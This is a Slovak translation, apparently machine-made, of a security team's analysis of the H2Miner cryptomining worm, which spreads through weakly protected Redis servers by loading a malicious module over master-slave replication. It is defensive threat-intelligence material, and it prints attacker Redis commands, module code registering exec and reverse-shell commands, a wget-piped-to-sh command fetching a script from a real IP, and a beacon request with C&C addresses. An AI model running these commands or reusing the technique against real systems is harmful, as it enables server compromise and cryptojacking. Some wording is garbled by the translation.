Pred dňom bol jeden zo serverov môjho projektu napadnutý podobným červom. Pri hľadaní odpovede na otázku "Čo to bolo?" Našiel som skvelý článok od tímu Alibaba Cloud Security. Keďže som tento článok na Habrém nenašla, rozhodla som sa ho preložiť špeciálne pre vás <3
Vstup
Nedávno bezpečnostný tím Alibaba Cloud objavil náhle prepuknutie H2Miner. Tento typ škodlivého červa využíva nedostatočnú autorizáciu alebo slabé heslá pre Redis ako brány do vašich systémov, potom synchronizuje svoj vlastný škodlivý modul s podriadeným prostredníctvom synchronizácie master-slave a nakoniec stiahne tento škodlivý modul do napadnutého počítača a spustí škodlivý modul. inštrukcie.
V minulosti boli útoky na vaše systémy primárne vykonávané pomocou metódy zahŕňajúcej naplánované úlohy alebo kľúče SSH, ktoré boli zapísané na váš počítač po prihlásení útočníka do Redis. Našťastie túto metódu nemožno často používať kvôli problémom s kontrolou povolení alebo kvôli rôznym verziám systému. Tento spôsob načítania škodlivého modulu však môže priamo vykonať príkazy útočníka alebo získať prístup k shellu, čo je pre váš systém nebezpečné.
Vzhľadom na veľký počet serverov Redis hostovaných na internete (takmer 1 milión), bezpečnostný tím Alibaba Cloud ako priateľské pripomenutie odporúča, aby používatelia nezdieľali Redis online a pravidelne kontrolovali silu svojich hesiel a či nie sú ohrozené. rýchly výber.
H2Miner
H2Miner je ťažobný botnet pre systémy založené na Linuxe, ktorý môže napadnúť váš systém rôznymi spôsobmi, vrátane nedostatočnej autorizácie v zraniteľnostiach Hadoop yarn, Docker a Redis remote command execute (RCE). Botnet funguje tak, že sťahuje škodlivé skripty a malvér na ťažbu vašich údajov, horizontálne rozšírenie útoku a udržiavanie komunikácie príkazov a riadenia (C&C).
Redis RCE
Znalosti na túto tému zdieľal Pavel Toporkov na ZeroNights 2018. Po verzii 4.0 podporuje Redis funkciu načítania zásuvných modulov, ktorá používateľom umožňuje načítať súbory kompilované pomocou C do Redis, aby mohli vykonávať špecifické príkazy Redis. Táto funkcia, aj keď je užitočná, obsahuje zraniteľnosť, pri ktorej v režime master-slave môžu byť súbory synchronizované s slave cez režim úplnej resynchronizácie. To môže útočník použiť na prenos škodlivých súborov so. Po dokončení prenosu útočníci nahrajú modul na napadnutú inštanciu Redis a vykonajú ľubovoľný príkaz.
Analýza malvérových červov
Bezpečnostný tím Alibaba Cloud nedávno zistil, že veľkosť skupiny škodlivých baníkov H2Miner sa náhle dramaticky zväčšila. Podľa analýzy je všeobecný proces výskytu útoku nasledovný:
H2Miner využíva RCE Redis na plnohodnotný útok. Útočníci najskôr zaútočia na nechránené servery Redis alebo servery so slabými heslami.
Potom použijú príkaz config set dbfilename red2.so pre zmenu názvu súboru. Potom útočníci vykonajú príkaz slaveof na nastavenie adresy hostiteľa replikácie master-slave.
Keď napadnutá inštancia Redis vytvorí spojenie master-slave so škodlivým Redis, ktorý je vo vlastníctve útočníka, útočník odošle infikovaný modul pomocou príkazu fullresync na synchronizáciu súborov. Súbor red2.so sa potom stiahne do napadnutého počítača. Útočníci potom použijú zavádzací modul ./red2.so na načítanie tohto súboru so. Modul môže vykonávať príkazy od útočníka alebo iniciovať spätné spojenie (backdoor), aby získal prístup k napadnutému stroju.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Po vykonaní škodlivého príkazu ako napr / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, útočník resetuje názov záložného súboru a uvoľní systémový modul, aby vyčistil stopy. Súbor red2.so však stále zostane na napadnutom počítači. Používateľom sa odporúča venovať pozornosť prítomnosti takéhoto podozrivého súboru v priečinku ich inštancie Redis.
Okrem zabitia niektorých škodlivých procesov na ukradnutie zdrojov útočník nasledoval škodlivý skript stiahnutím a spustením škodlivých binárnych súborov do . To znamená, že názov procesu alebo názov adresára obsahujúceho príbuznosť na hostiteľovi môže naznačovať, že tento počítač bol infikovaný týmto vírusom.
Podľa výsledkov reverzného inžinierstva vykonáva malvér najmä tieto funkcie:
- Nahrávanie súborov a ich spustenie
- Ťažba
- Udržiavanie komunikácie C&C a vykonávanie príkazov útočníka
Použite masscan na externé skenovanie, aby ste rozšírili svoj vplyv. Okrem toho je IP adresa C&C servera pevne zakódovaná v programe a napadnutý hostiteľ bude komunikovať s C&C komunikačným serverom pomocou HTTP požiadaviek, kde sú informácie o zombie (kompromitovanom serveri) identifikované v HTTP hlavičke.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Iné spôsoby útoku
Adresy a odkazy používané červom
/príbuzenstvo
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
rada
Po prvé, Redis by nemal byť prístupný z internetu a mal by byť chránený silným heslom. Je tiež dôležité, aby klienti skontrolovali, či sa v adresári Redis nenachádza žiadny súbor red2.so a či sa v názve súboru/procesu na hostiteľovi nenachádza žiadny „príbuzný“.
Zdroj: hab.com